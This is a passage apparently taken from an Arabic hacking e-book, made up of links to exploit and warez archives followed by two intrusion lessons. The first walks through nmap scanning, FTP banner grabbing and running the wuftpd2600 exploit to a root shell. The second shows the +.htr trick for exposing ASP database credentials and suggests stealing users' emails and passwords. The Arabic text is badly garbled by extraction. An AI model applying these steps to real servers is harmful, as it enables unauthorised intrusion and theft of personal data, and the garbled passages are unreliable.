www .securiteam.com/exploits/archive.html
‫ﺄرﺷﯿ ﻒﻟﺜﻐ ﺮا ت‬
http://www .ussrback.com/
‫اﻟﻜﺜﯿ ﺮ‬+ ‫ﺄرﺷﯿ ﻒﺛﻐ ﺮا ت‬
http://www.secureroot.com/
‫ﺄرﺷﯿ ﻒﺛﻐ ﺮا ت‬
http://rootshell.redi.tk/
‫ﺄرﺷﯿ ﻒﺛﻐ ﺮا ت‬

١ ٥٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

http://www .ussrback.com/
‫ﻗﻊﻟﺜﻐ ﺮا ت‬‫ﻣﻮا‬
www .secureroot.com/category/exploits
‫ﻗﻊاﻟﻬﺎﻛﯿﻨ ﻖ‬ ‫ﺪﻟﯿ ﻞﻟﻤﻮا‬
www.hitboss.com/Hacking
‫ﻣ ﺤ ﺮكﺑ ﺤﺚ ﻻ ﻏﻨﻲ ﻋﻨﻪ‬
www.undergroundnews.com/resources/s...ound/search.asp
Warez.com-Underground
http://www .warez.com/
Hacking
(‫ﺘﺎزﻟﻤﻦ ﯾ ﺮﯾﺪاﻟﺒﺪاﯾﻪ‬‫)ﻣﻤ‬
http://www.neworder.box.sk/
Security Search Engine
http://www.bugs2k.com/
insecure
http://www .insecure.org/
</XMP></BODY></HTML>
http://public.www .easynet.co.uk/cgi...ail/formmail.pl

...

١ ٥٥
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" درس ﰲ اﺧﱰاق اﳌﻮاﻗﻊ )ﻣﺘﻮﺳﻂ( "‬

‫‪$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪ICER :‬‬
‫‪$$$$$$$$$$‬‬

‫ﺘ ﺮﻣﻪ‬‫اﻻدوا تاﻟﻤﻄﻠﻮﺑﻪ ‪ :‬ﺷﯿ ﻞاﻛﺎوﻧ ﺖ ‪...‬اذاﺑ ﺤﺜ ﺖﻓﻲ ﺟﻮﺟ ﻞ ﺳﻮ فﺗﺠﺪاﻟﻜﺜﯿ ﺮ ﻣﻦاﻟﺸﯿﻠﺰ و ﻃﺒﻌﺎاﻟﻨﺎساﻟﻤ ﺤ‬
‫ﺘ ﺮﻛﺐﻟﯿﻨﻜ ﺲاو ﯾﻮﻧﯿﻜ ﺲ وﺗﻌﯿ ﺶ ﺣﯿﺎﺗﻬﺎ وﺗ ﺮﯾﺢ ﻧﻔﺴﻬﺎ‪...‬ﻓﻲ ﻧﺎسﺗﺎﻧﯿﻪ ﻣﺎﺗ ﺤﺒ ﺶاﻟﻠﯿﻨﻜ ﺲ‬ ‫)ا ﺣﻤﻤﻤﻢ(ﺑ‬
‫ﺘﻌﻤ ﻞاﻻﺗﻨﯿﻦ ‪(:‬‬ ‫اﻟﺸﯿ ﻞاﻛﺎوﻧ ﺖﻛﻮﯾ ﺲﻟﻬﺎ و ﻣﻤﻜﻦ ﯾﻤﺸﻲ واﻧﺎ ﻋﻦ ﻧﻔﺴﻲ ﻣ ﺶ ﺣﺎﺳ‬
‫ﺘﺎﻛﺪواﻧﻪﺑﯿﺴﻤﺢﺑﺎﻟﺒ ﺮاﻣ ﺞاﻻﺳﺎﺳﯿﻪ زي‬ ‫ﺘﻌﻤﻠﻮاﻟﺸﯿ ﻞ ﻻزم ﯾ‬ ‫ﺑ ﺲﺑﺎﻟﻨﺴﺒﻪﻟﻠﻲ ﺣﯿﺴ‬
‫‪nslookup, host, dig, ping, traceroute,telnet, ssh, ftp‬‬
‫واﺳﺎﺳﻲ ﻻزما ل ‪ gcc‬ﻋﺸﺎنﺗﻌ ﺮ فﺗﻌﻤ ﻞﻛﻮﻣﺒﺎﯾ ﻞ‪)...‬ﯾﺎ ﻋﻢ رﻛﺐﻟﯿﻨﻜ ﺲ و رﯾﺢ ﻧﻔﺴﻚ ( و ﻃﺒﻌﺎاﻻدوا ت‬
‫دي ‪ nmap and netcat‬وا ﺧ ﺮ ﺣﺎﺟﻪ ﻫﻲاﻻﻛﺴﺒﻠﻮﯾ ﺖ ‪.‬‬
‫*ﺑﻌ ﺾاﻟﻤﻠ ﺤﻮﻇﺎ تاﻟﻬﺎﻣﻪ ‪:‬‬
‫ﻗ ﺶﻛﯿﻔﯿﻪاﻟ ﺤﺼﻮ ل ﻋﻠﻰ‬ ‫ﺘﻼ فﻓﻲاﻻواﻣ ﺮ واﻟﻮﻇﺎﺋ ﻒ ‪..‬ﻣ ﺶ ﺣﻨﺎ‬ ‫‪-١‬اﻟﺸﯿ ﻞاﻛﺎوﻧ ﺖ ﺷﺒﯿﻪ ﺟﺪاﺑﺎﻟﺪوس ﻣﻊا ﺧ‬
‫وا ﺣﺪ ﻻنﻓﯿﻪ ﻣﻮا ﺿﯿﻊﻛﺜﯿ ﺮهاﺗﻜﻠﻤ ﺖ ﻋﻠﯿﻪ‪.‬‬
‫ﺘﻘﺪم ‪.‬‬ ‫‪-٢‬اداها ل ‪ nmap‬ﻫﻲ ﻋﺒﺎره ﻋﻦﺑﻮر ت ﺳﻜﺎﻧ ﺮ ﻣ‬
‫ﺘﻠﻨ ﺖ وﺗﻘﻮمﺑ ﺮﻓﻊﺑﯿﺎﻧﺎ تﻟﺴﯿ ﺮﻓﯿ ﺮ ﻣﻌﯿﻦ ‪.‬‬ ‫‪-٣‬ا ل ‪ NetCat‬ﻫﻲاداه ﺷﺒﯿﻪﺑﺎﻟ‬
‫ﺘﻮﺑﻪﺑﻠﻐﻪاﻟﺴﻲ وﻫﻲﺗﻘﻮمﺑﺎﻋﻄﺎﺋﻚﻛﺎﻓﻪاﻟﺼﻼ ﺣﯿﺎ ت‬ ‫ﺘﺎ تﻫﻲ ﻋﺒﺎره ﻋﻦﺑ ﺮاﻣ ﺞ ﻏﺎﻟﺒﺎﺗﻜﻮن ﻣﻜ‬ ‫‪-٤‬اﻻﻛﺴﺒﻠﻮﯾ‬
‫ﻗﯿﻬﺎﻓﯿﻦ؟؟؟‬ ‫ﺘ ﺮ ق ﺟﻬﺎز ﻣﻌﯿﻦ وﺗﻘﻮمﺑﻌﻤ ﻞﻛ ﻞ ﺷﻲ ءاﻧ ﺖﺗ ﺮﯾﺪه ﻣﻤﻜﻦﺗﻼ‬ ‫ﻓﻬﻲﺗﺨ‬
‫ﻗﻊﺗﺠﯿﺐ ﻣﻨﻪاﻟ ﺤﺎﺟﺎ ت‬ ‫ﺘ ﺶﻗﻮﻟﻲ واﻧﺎادﯾﻠﻚﻛﺎم ﻣﻮ‬ ‫ﺘﻲ ﻋﻠﻰاﻓﻪ ﻣﻦ ﯾﺸﯿ ﻞ‪...‬دور وﻟﻮ ﻣﺎﻟﻘﯿ‬ ‫ﻗﻊاﻟﺴﯿﻜﯿﻮرﯾ‬ ‫ﻣﻮا‬
‫دي‪....‬‬
‫ﻗﻊاﻟﻤﺮﺗﺒﻄﻪﺑﺎﻟﻤﻮ ﺿﻮ ع ‪:‬‬ ‫*اﻟﻤﻮا‬
‫‪(a) Linux (http://www.slackware.com‬‬
‫‪(b) Nmap (http://www.insecure.org‬‬
‫‪(/c) NetCat (http://www.l0pht.com/~weld/netcat‬‬

‫اﻟﺨﻄﻮا ت ‪-:‬‬
‫ﺘﻠﻚ ﻣﻔﯿ ﺶا ﺣﺴﻦ ﻣﻦاﻟﻠﯿﻨﻜ ﺲ ‪( P:‬‬
‫‪ -١‬رﻛﺐاﻟﯿﻨﻜ ﺲ و ﺧ ﺶ ﻋﺎﻟﻨ ﺖ )ﻣ ﺶﻗﻠ‬
‫ﺘﺎﻟﻲ ‪:‬‬‫ﺘﺒﻌﺎاﻟ‬
‫‪ -٢‬رﻛﺐاﻻداه ‪ nmap‬ﻣ‬
‫*‪tar zxvf nmap.tar.gz (١‬‬
‫‪cd nmap (٢‬‬
‫‪configure && make && make install/. (٣‬‬

‫ﺘﻬﺪ ف وﻟﯿﻜﻦ ‪..‬‬


‫ﻗﻊاﻟﻤﺴ‬ ‫‪-٣‬ﺷﻮ فاﻟﻤﻮ‬
‫‪www.target.com‬‬
‫ﺘﺨﺪام ‪nslookup www.target.com‬‬ ‫ﻗﻊﺑﺎﺳ‬‫‪ -٤‬ﺷﻮ فاﻻيﺑﻲﺗﺒﻊاﻟﻤﻮ‬
‫ﻗﻊ وﻟﯿﻜﻦ ‪١٩٦٫١٫٢٫٣‬‬ ‫ﻫﺬا ﺳﻮ ف ﯾﻌ ﺮ ضﻟﻚاﻻيﺑﻲﻟﻠﻤﻮ‬
‫ﺘﺎﻟﻲ ‪-:‬‬
‫ﺘﺒﻌﺎاﻟ‬
‫ﺘﺸﻐﯿ ﻞ ﻣ‬
‫ﻗﻊ وﻛﻤﺎن ﺷﻮ ف ﻧﻈﺎماﻟ‬‫‪ -٥‬ﺷﻮ فاﻟﺨﺪﻣﺎ تاﻟﻠﻲﺑﯿﻘﺪﻣﻬﺎاﻟﻤﻮ‬

‫"‪"nmap -sS -O 196.1.2.3‬‬

‫‪١ ٥٦‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

-: ‫ﺎﻟﻤﻔ ﺮو ضاﻧﻪ ﯾﺪﯾﻚ ﻣﺨ ﺮﺟﺎ ت ﺷﺒﻪاﻟﻜﻼم ده‬


root@IcEr:~# nmap -sS -O 196.1.2.3
( /Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap
:(Interesting ports on www.target.com (196.1.2.3
(The 1531 ports scanned but not shown below are in state: closed)
Port State Service
tcp open ftp/٢١
tcp open smtp/٢٥
tcp open http/٨٠
tcp open sunrpc/١١١
tcp open auth/١١٣
tcp open printer/٥١٥
tcp open unknown/٩٦٣
tcp open kdm/١٠٢٤
tcp filtered krb524/٤٤٤٤
tcp open X11/٦٠٠٠
tcp filtered napster/٦٦٩٩
OS guess for host: Linux 2.2.14-2.2.16
(Uptime 0.160 days (since Mon Apr 30 14:51:06 2001
Nmap run completed -- 1 IP address (1 host up) scanned in 67 seconds
#~:root@IcEr

...‫( ﻧﻜﻤ ﻞ‬: ‫ﺗﻤﺎمﻛﺪه ﯾﺎ ﺷﺒﺎب‬


FTP ‫ﻣﻤﻜﻦﺗﺸﻮ فﻟﻮﻛﺎنﻓﯿﻪ‬..‫ﺘﻮ ﺣﻪ‬ ‫ﻗﻊ ﯾﻮرﯾﻚاﻟﺒﻮرﺗﺎ تاﻟﻤﻔ‬‫ﺘﻜﺸﺎ فﻟﻠﻤﻮ‬ ‫اﻟﻜﻼم دهﻛﻠﻪ ﻋﺒﺎره ﻋﻦاﺳ‬
‫ﻗﯿﻪ ﻣﻮﺟﻮد و دهﻛﻮﯾ ﺲ‬ ‫ﻗﻊ و ﻻ ﻓﻲاﻟﻤﺜﺎ لاﻟﻠﻲﻓﻮ ق ﺣﻨﻼ‬ ‫ ﺷﻐﺎ ل ﻋﻠﻰاﻟﻤﻮ‬daemon
-: ‫ﺘﺎﻟﻲ‬
‫ﺘﺒﻌﺎاﻟ‬‫ ﻣﻮﺟﻮده ﻣ‬FTP daemon ‫ﺷﻮ فايﻓﯿ ﺮﺟﯿﻦ ﻣﻦ‬
"telnet 196.1.2.3 21"
‫او‬
"ftp 196.1.2.3"
‫ﺘﺎﻋﻪاﻻ فﺗﻲﺑﻲ دﯾﻤﻮناﻟﻠﻲ ﺷﻐﺎﻟﻪ ﻋﻠﻰاﻟﺴﯿ ﺮﻓﯿ ﺮ ﻣﻤﻜﻦ ﯾﻜﻮن زيﻛﺪه‬ ‫اي ﻣﻨﻬﻢ ﺣﯿﺪﯾﻚﺑﺎﻧ ﺮﻓﯿﻪاﻟﻔﯿ ﺮﺟﯿﻦﺑ‬

root@IcEr:~# ftp 196.1.2.3


.Connected to 196.1.2.3
www.target.com FTP server (Version wu-2.6.0(1) Mon Mar 6 ٢٢٠
(13:54:16 SAST 2000
.ready
Name (target:root): anonymous
.Guest login ok, send your complete e-mail address as password ٣٣١
:Password
Welcome, archive user! This is an experimental FTP server. If have -٢٣٠
any

١ ٥٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

unusual problems, please report them via e-mail to -٢٣٠


root@IcEr.pandora.net
If you do have problems, please try using a dash (-) as the first -٢٣٠
character
of your password -- this will turn off the continuation messages -٢٣٠
that may
.be confusing your ftp client-٢٣٠
-٢٣٠
.Guest login ok, access restrictions apply ٢٣٠
.Remote system type is UNIX
.Using binary mode to transfer files
ftp>by
#~:root@IcEr
.wu-2.6.0 ‫ﻣﻦاﻟﻜﻼم دهﺗﻘﺪرﺗﻌ ﺮ فاناﻟﻔﯿ ﺮﺟﯿﻦاﻟﻤﻮﺟﻮده ﻫﻲ‬
(‫ وﻛﺎﻧ ﺖاﻋﻤﻠﯿﻪ ﻧﺎﺟ ﺤﻪ؛‬anonymous ‫واﯾ ﻀﺎا ﺣﻨﺎ ﺣﺎوﻟﻨﺎ ﻧﺨ ﺶﻛﻤﺠﻬﻮﻟﯿﻦ‬
####### ‫ﺘﺎر‬ ‫ ﺻﻠﻲ ﻋﻠﻰاﻟ ﺤﺒﯿﺐاﻟﻤﺨ‬#######
-: ‫ ﻣ ﺶﻓﺎﻛ ﺮاﻟﻤﻬﻢاﻧﻬﺎاﻫﻢ ﺧﻄﻮه‬٨ ‫او‬٧
( ‫ﺘﻮﻫ ﺶ‬‫ )اﻟﻠﻲ ﯾﻌﻤ ﻞ ﺳﯿ ﺮ ش ﻣﯿ‬.FTPd ‫ﺘﺎﻋﻪاﻟﻔﯿ ﺮﺟﯿﻦ دﯾﻪ ﻣﻦ‬ ‫ا ﺣﺼ ﻞ ﻋﻠﻰاﻻﻛﺴﺒﻠﻮﯾ ﺖ ﺑ‬
wuftpd2600.c ‫ﺘﻜﻦ‬ ‫وﻟ‬
red hat 6.2 ‫ﺘﻜﻮده ﻋﺸﺎن ﻧﻈﺎمﺗﺸﻐﯿ ﻞ ﻣﻌﯿﻦ وﻟﯿﻜﻦ‬ ‫ﻗﻲاﻧﻬﺎ ﻣ‬ ‫ﺘﻼ‬ ‫ﺘﺎﻋﻬﺎ ﺣ‬ ‫اﻟﻤﻬﻢﻟﻮ ﺷﻔ ﺖاﻟﺴﻮرسﻛﻮدﺑ‬
‫ﺘﺸﻐﯿ ﻞ دهﻛﺪه ﯾﺒﻘﻰﻛ ﻞاﻟﻠﻲﺗﻌﻤﻠﻪاﻧﻚﺗﻌﻤ ﻞﻛﻮﻣﺒﺎﯾ ﻞ‬‫ﺘﻬﺪ فﺑﯿﻌﻤ ﻞ ﻋﻠﻰ ﻧﻈﺎماﻟ‬ ‫ﻗﻊاﻟﻤﺴ‬ ‫و ﯾﺎ ﺳﻼمﻟﻮﻛﺎناﻟﻤﻮ‬
root access ‫ﺘﻬﺪ ف وﻛﺪه ﺣﯿﺪﯾﻚ‬ ‫ﻗﻊاﻟﻤﺴ‬ ‫ﻟﻠﺜﻐ ﺮه دي وﺑﺸﻐﻠﻬﺎ ﻋﻠﻰ ﺳﯿ ﺮﻓ ﺮاﻟﻤﻮ‬
root@IcEr:~/# ./wuftpd2600 -t -s 0 196.1.2.3
Target: 196.1.2.3 (ftp/<shellcode>): RedHat 6.2 (?) with wuftpd 2.6.0(1)
from rpm
Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152
..loggin into system
USER ftp
.Guest login ok, send your complete e-mail address as password ٣٣١
<PASS <shellcode
Next time please use your e-mail address as your password-٢٣٠
for example: icer@ae.net -٢٣٠
.Guest login ok, access restrictions apply ٢٣٠
STEP 2 : Skipping, magic number already exists:
[[87,01:03,02:01,01:02,04
STEP 3 : Checking if we can reach our return address by format string
(STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now
.STEP 5 : Sending code.. this will take about 10 seconds
Press ^\ to leave shell
Linux lame_box.za.net 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686
unknown
(uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp

١ ٥٨
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪!Bang! You have root‬‬


‫ﻃﺒﻌﺎاﻧﺎ ﻧﺴﯿ ﺖاﻣ ﺮاﻟﻜﻮﻣﺒﺎﯾ ﻞ ‪..‬ﺷﻮ فاﻻﻣ ﺮ ده ‪man gcc‬‬
‫و ﻫﻮه ﺣﯿﺪﯾﻠﻚ ﻣﻌﻠﻮﻣﺎ تﻛﺎﻣﻠﻪ ﻋﻦاﻣ ﺮاﻟﻜﻮﻣﺒﺎﯾ ﻞ ‪..‬ﺑﻜ ﻞاﻟﺨﯿﺎرا تاﻟﻠﻲ ﻣﻌﺎهﻛﺪه ﯾﺒﻘﻰاﻧﺎﻛﺪه ﻋﻤﻠ ﺖاﻟﻠﻲ‬
‫ﻋﻠﯿﻪ ﻣ ﺤﺪ ش ﯾﺴﺎﻟﻨﻲﺑﺎهﺑﻌﺪﻛﺪه و ﯾﻘﻮﻟﻲ ﯾﺎواد ﯾﺎاﯾﺴ ﺮاﻋﻤ ﻞاﯾﻪ‬
‫‪search..U will find what U wanna‬‬
‫ﺘﺎﺟﻪ‪..‬‬
‫ﺘﺤ‬‫ﻃﯿﺐ ‪...‬اه ﻧﺴﯿ ﺖ ‪..‬ﻣ ﺤﺪ ش ﺳﺎﻟﻨﻲاﻋﻤ ﻞﺑﺎﻟﻨ ﺖﻛﺎ تﺑﻌﺪﻛﺪه ‪..‬ﺑﻌ ﺾاﻟﺜﻐ ﺮا تﺑ‬
‫ﺘﻐﻠﯿﻨﺎ ﺧﺎ ﺻﯿﻪا ل ‪ annonymous‬اﻟﻤﻮﺟﻮده ‪..‬ﻻﻛﻦﻟﻮﻛﺎﻧ ﺖاﻟﺨﺎ ﺻﯿﻪ دي ﻣ ﺶ‬ ‫ﻟﻮ ﻻ ﺣﻈ ﺖاﻧﻨﺎاﺳ‬
‫ﺘﻐ ﻞ ‪..‬ﻓﻲﻫﺬهاﻟ ﺤﺎﻟﻪ‬
‫ﻣﻮﺟﻮده ‪..‬ﯾﺒﻘﻰ ﻣ ﺶ ﺣﻨﻌ ﺮ ف ﻧﻜﻤ ﻞاﻟﻜﻼم ده ‪ .....‬ﻋﺸﺎناﻻﻛﺴﺒﻠﻮﯾ ﺖ ﻣ ﺶﺗﺸ‬
‫ﻗﻊ‪..‬‬‫ﺘﺎ عاﻟﻤﻮ‬ ‫ﺘﻐ ﻞاﻻﻟﻮ ﻣﻌﺎﻧﺎﺑﺎﺳﻮرد و ﯾﻮزر ﻧﯿﻢ ﻋﺸﺎن ﻧﺨ ﺶ ﻋﻠﻰاﻻ فﺗﻲﺑﻲﺑ‬ ‫اﻻﻛﺴﺒﻠﻮﯾ ﺖ ﻣ ﺶﺗﺸ‬
‫ﺘﻜ ﺲ و ﺷﻐ ﻞ ﺧﺎ صﺑﯿﻬﺎ‪..‬ﺑ ﺲ‬ ‫ﺘﺎ عاﻻﻛﺴﺒﻠﻮﯾ ﺖ‪..‬وﻛ ﻞاﻛﺴﺒﻠﻮﯾ ﺖﻟﻬﺎ ﺳﺎﯾﻨ‬ ‫ﻋﺸﺎنﻛﺪه ﻻزمﺗﻘ ﺮااﻟﺴﻮرسﺑ‬
‫اﻟﻤﺒﺎدئاﻻﺳﺎﺳﯿﻪ وا ﺣﺪه‪....‬‬

‫‪١ ٥٩‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" اﺧﱰاق اﻟـ‪" SQL‬‬

‫‪$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪linuxray :‬‬
‫‪$$$$$$$$$$$$‬‬

‫س‪:‬ﻓﻲاﻟﺒﺪاﯾﺔ ﻣﺎﻫﻲاﻻسﻛﯿﻮا ل ) ‪( SQL‬؟؟‬

‫ﺘﻬﯿﺔ ب‬‫ﺘﻲﺗﻜﻮن ﺻﻔ ﺤﺎﺗﻬﺎ ﻣﻨ‬ ‫ﻗﻊاﻟ‬ ‫ﺘﻮي ﻋﻠﻰ ﺟﺪاو ل واﻏﻠﺐاﻟﻤﻮا‬ ‫اﻻسﻛﯿﻮا ل ﻫﻲ ﻋﺒﺎرة ﻋﻦﻗﺎﻋﺪﺑﯿﺎﻧﺎ تﺗ ﺤ‬
‫‪ ASP‬ﻫﻲ ﺻﻔ ﺤﺎ تﺗﺴ ﺤﺐﺑﯿﺎﻧﺎﺗﻬﺎ ﻣﻦﻗﺎﻋﺪة ‪ SQL‬و ﺻﻔ ﺤﺎ ت ‪ ASP‬ﻣﻤﻜﻦانﺗﻜﻮنﻛﻨﺰ ﻣﻦاﻟﻤﻌﻠﻮﻣﺎ ت‬
‫ﺘﻨﺼ ﺖ ﻋﻠﻰاﻟﺒﻮر ت ‪١٤٣٣‬‬ ‫ﺘ ﺮا قﻗﻮاﻋﺪﺑﯿﺎﻧﺎ ت ‪ QLS‬وﻫﺬا ﻣﺎﺳﻮ فاﺷﯿ ﺮاﻟﯿﻪ ﻻ ﺣﻘﺎ ‪ ،‬و ‪ SQL‬ﺗ‬ ‫ﻻﺧ‬
‫ﺘﻮي‬ ‫ﺘﻮي ﻋﻠﻰاﻛﺜ ﺮ ﻣﻦﻗﺎﻋﺪةﺑﯿﺎﻧﺎ ت وﻛ ﻞﻗﺎﻋﺪةﺑﯿﺎﻧﺎ تﺗ ﺤ‬ ‫اﯾ ﻀﺎ ﻣﺎارﯾﺪانا ﺧﺒ ﺮكﺑﻪانا ل ‪SQL‬ﻗﺪﺗ ﺤ‬
‫ﻋﻠﻰ ﻋﺪد ﻣﻦاﻟﺠﺪاو ل ﯾﻤﻜﻦ‬
‫ﺘﻮﯾﻬﺎ ‪.‬‬‫ﺘﻰﺗ ﺤ‬
‫ﻗﻮاﻋﺪﺑﯿﺎﻧﺎ ت ‪ SQL‬واﻟﻌﺪداﻟﻜﺒﯿ ﺮ ﻣﻦاﻟﺒﯿﺎﻧﺎ تاﻟ‬ ‫ﺘﺼﻮرﻛﺒ ﺮ‬‫انﺗ‬

‫ﻗ ﺖﻗﺎﻋﺪةﺑﯿﺎﻧﺎ ت ‪ SQL‬؟‬ ‫ﺘﺮ‬ ‫ﺘﻔﯿﺪ ﻣﻨﻪاذاا ﺧ‬


‫س‪ :‬ﻣﺎﻟﺬي ﯾﻤﻜﻦاناﺳ‬
‫ﺘﺪﯾﺎ ت ‪ASP‬ﻓﻲ‬ ‫ﺘﺪﯾﺎ ت ‪PHP‬ﺑ ﻞ ﻣﻨ‬ ‫ﻗﺼﺪ ﻣﻨ‬ ‫ﺘﺪى ﻻا‬ ‫ﻗﻊ ﻣﻨ‬‫ﻗﻊاذاﻛﺎن ﻫﺬااﻟﻤﻮ‬ ‫ﻫﺬا ﻋﻠﻰ ﺣﺴﺐ ﻧﺸﺎطاﻟﻤﻮ‬
‫اﻟﻐﺎﻟﺐ ﺳﻮ فﺗ ﺤﺼ ﻞ ﻋﻠﻰ ﺟﻤﯿﻊاﺳﻤﺎ ء‬
‫ﺘﺨﺪﻣﯿﻦ وﻛﻠﻤﺎ تاﻟﺴ ﺮ وﺑﺎﻣﻜﺎﻧﻚﺗﻌﺪﯾ ﻞ و ﺣﺬ فاي ﻣﻮ ﺿﻮ ع و ﺻﻼ ﺣﯿﺎ تﻟﻢﺗﻜﻦﺗ ﺤﻠﻢﺑﻬﺎ ‪،‬اﻣﺎاذاﻛﺎن‬ ‫اﻟﻤﺴ‬
‫ﺘﻮي ﻋﻠﻰ ﻣﯿﺰة‬
‫ﻗﻊ ﯾ ﺤ‬
‫اﻟﻤﻮ‬
‫ﻗﺎﺋﻤﺔاﻟﻤ ﺮاﺳﻼ تﻓﺴﻮ فﺗ ﺤﺼ ﻞ ﻋﻠﻰاﻋﺪاد ﺧﯿﺎﻟﯿﺔ ﻣﻦاﻻﯾﻤﯿﻼ ت ‪ ،‬ﻋﻨﺪﻫﺎﻗﻢﺑﺎﻧﺸﺎ ء ﺷ ﺮﻛﺔﻟﻠﺪﻋﺎﯾﺔ واﻻﻋﻼن‬
‫وﺳﻮ فﺗﺼﺒﺢﺛ ﺮﯾﺎاذن ﻻﺗﻨﺴﻰ _‪LinuxRay‬‬
‫ﻗﺎم ﻫﻮاﺗ ﻒ ‪ -‬ﻋﻨﺎوﯾﻦ ‪-‬ﺗﻮراﯾ ﺦاﻟﻤﯿﻼد ‪،‬‬ ‫ﻗﻊانﺗﺠﺪاي ﺷﺊ دا ﺧ ﻞﻗﻮاﻋﺪﺑﯿﺎﻧﺎ ت ﻣﻌﻠﻮﻣﺎ تاﺷﺨﺎ ص ‪-‬ار‬ ‫ﺗﻮ‬
‫ﻣﻤﻜﻦانﺗﺼﺒﺢ ‪. Administrator‬‬
‫ﺘﻌﺪ ﻧﺸﺎ ﻃﻚ ﻣﻦ ﺟﺪﯾﺪﻓﺎﻟﻄ ﺮﯾ ﻖ ﻣﺎزا ل ﻃﻮﯾﻼ ‪...‬‬‫اﻋ ﺮ فاﻧﻪﻗﺪا ﺻﺎﺑﻚاﻟﻤﻠ ﻞاﻻنﻟﻜﻦاﺳ‬

‫ﺘﺎﺟﺔﻟﻠﺪ ﺧﻮ ل ﻋﻠﻰﻗﻮاﻋﺪﺑﯿﺎﻧﺎ ت ‪ SQL‬؟‬


‫س‪ :‬ﻣﺎﻟﺬيﺗ ﺤ‬
‫ﺘﺎجﻓﻘﻂﻟ ﻞ ‪ User Name‬و ‪Passwd‬‬ ‫ﺗﺤ‬

‫ﺘﺨﺪم وﻛﻠﻤﺔاﻟﻤ ﺮور ؟‬ ‫س‪ :‬ﻣﻦاﯾﻦا ﺣﺼ ﻞ ﻋﻠﻰاﺳﻢاﻟﻤﺴ‬


‫ﻫﻨﺎك ﻃ ﺮ ق ﻋﺪﯾﺪةﻟﻠ ﺤﺼﻮ ل ﻋﻠﻰ ‪ User name and Passwd‬ﻣﻨﻬﺎﻛﻤﺎاﺳﻠ ﻒ ﺻﻔ ﺤﺎ تا ل ‪ASP‬‬
‫وﻣﻠﻔﺎ تا ﺧ ﺮى ﻣﻦ ﻧﻮ ع *‪sql.‬ﻫﻨﺎكﺛﻐ ﺮا تﻛﺜﯿ ﺮ ﯾﻤﻜﻦ‬
‫انﺗ ﺤﺼ ﻞ ﻣﻨﻬﺎ ﻋﻠﻰﻛﻠﻤﺎ تاﻟﻤ ﺮور ﻣﺜ ﻞﺛﻐ ﺮة ‪htr.+‬‬
‫ﺘﺨﺪم ﻫﺬهاﻟﺜﻐ ﺮة ‪:‬‬ ‫ﻛﯿ ﻒﺗﺴ‬
‫‪htr.+asp.page/target//:http‬‬
‫ﻗﻊاﻟﻬﺪ ف‬ ‫‪: target‬اﻟﻤﻮ‬
‫‪ : Page‬ﺻﻔ ﺤﺔ ‪asp‬‬
‫‪: htr.+‬اﻟﺜﻐ ﺮة‬
‫ﺘﺴﺎ ء ل ﻣﺎﻟﻔﺎﺋﺪة‬
‫ﺘﻮي ﻋﻠﻰاي ﺣ ﺮ ف ‪....‬اﻋ ﺮ فاﻧﻚ ﺳﻮ فﺗ‬ ‫ﺘﺢ ﺻﻔ ﺤﺔﺑﯿ ﻀﺎ ء ﻻﺗ ﺤ‬‫ﻫﺬهاﻟﺜﻐ ﺮةﺗﻘﻮما ﺣﯿﺎﻧﺎﺑﻔ‬
‫اذن ﻣﻨﻬﺎاﻟﻔﺎﺋﺪة ﻫﻮ‬
‫ﺘﻰ‬ ‫ﺧﻠ ﻒﻫﺬهاﻟﺼﻔ ﺤﺔاﻟﺒﯿ ﻀﺎ ءاذﻫﺐاﻟﻰ ‪View Source‬ﻟﻜﻲﺗ ﺮىاواﻣ ﺮاﻟﺒ ﺮﻣﺠﺔاﻟﺨﺎ ﺻﺔ ب ‪ASP‬اﻟ‬

‫‪١ ٦٠‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻻﯾﻤﻜﻦﻟﻚانﺗ ﺮاﻫﺎﻓﻲاﻟﻮ ﺿﻊاﻟﻌﺎدي ‪ :‬ﻣﺜ ﻞ‬

‫>‪%‬‬
‫‪("Connection.ADODB")CreateObject.Server =Set DB‬‬
‫‪SQL =DRIVER"Open .DB‬‬
‫؛‪Developer (R)Microsoft =PPA‬‬‫‪=sa;PWD=xxx;UID=Server;SERVER‬‬
‫‪"٦٦٦٦٦٦٦" ،"yaRxuniL_" ،"moe_dbs=xxx;DATABASE=Studio;WSID‬‬

‫‪<%‬‬
‫‪-----------------------------------------------------------------‬‬
‫ﺘﺨﺪم ﻫﻮ _‪yaRxuniL‬‬ ‫ﻓﻲاﻟﻜﻮداﻟﺴﺎﺑ ﻖﺗ ﺮىاناﺳﻢاﻟﻤﺴ‬
‫وﻛﻠﻤﺔاﻟﺴ ﺮﻫﻲ ‪٦٦٦٦٦٦٦‬‬
‫‪-----------------------------------------------------------------‬‬
‫اﻟﺸﺊاﻟﻤ ﻀ ﺤﻚاﻧﻪا ﺣﯿﺎﻧﺎاذاﻛﺎن ﻫﻨﺎك ﺧﻄﺄﻓﻲ ﺻﻔ ﺤﺔا ل ‪ ASP‬ﻣﺜ ﻞاﻻﺗﻲ ‪:‬‬

‫' ‪'٨a٠١a٨٠٠AMicrosoft VBScript runtime error‬‬

‫‪'nnoC' :Object required‬‬

‫‪٥inc, line .filename/‬‬

‫ﺘﻮي ﻋﻠﻰاﺳﻢ‬
